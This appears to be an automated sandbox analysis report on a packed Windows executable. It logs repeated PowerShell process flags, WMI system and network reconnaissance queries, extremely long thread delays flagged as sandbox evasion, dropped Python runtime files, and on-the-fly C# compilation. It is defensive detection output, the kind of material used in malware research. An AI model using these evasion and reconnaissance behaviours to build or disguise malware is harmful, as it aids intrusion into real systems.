              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exe    Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exe    Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exe    Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exe    Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\getmac.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
              Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3491
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4369
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2437
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 458
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5861
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1770
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5009
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 924
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3392
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1563
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2375
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1358
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3355
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 956
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\python311.dll
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_sqlite3.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\select.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_queue.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_lzma.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\unicodedata.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_bz2.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_ssl.pyd
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3lfchnc2\3lfchnc2.dll
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_ctypes.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_socket.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_decimal.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI61762\_hashlib.pyd
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Check user administrative privileges: GetTokenInformation, graph_0-17268
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768 Thread sleep count: 3491 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320 Thread sleep count: 114 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612 Thread sleep count: 4369 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4796 Thread sleep count: 127 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7196 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848 Thread sleep count: 2437 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7448 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856 Thread sleep count: 458 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708 Thread sleep time: -20291418481080494s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512 Thread sleep count: 5009 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7208 Thread sleep count: 924 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440 Thread sleep count: 3392 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8124 Thread sleep count: 1563 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4164 Thread sleep count: 2375 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4832 Thread sleep count: 1358 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1868 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4760 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104 Thread sleep count: 3355 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900 Thread sleep count: 956 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3608 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
              Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Code function: 0_2_00007FF78DA592F0 FindFirstFileExW,FindClose,0_2_00007FF78DA592F0
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exe Code function: 0_2_00007FF78DA583B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF78DA583B0
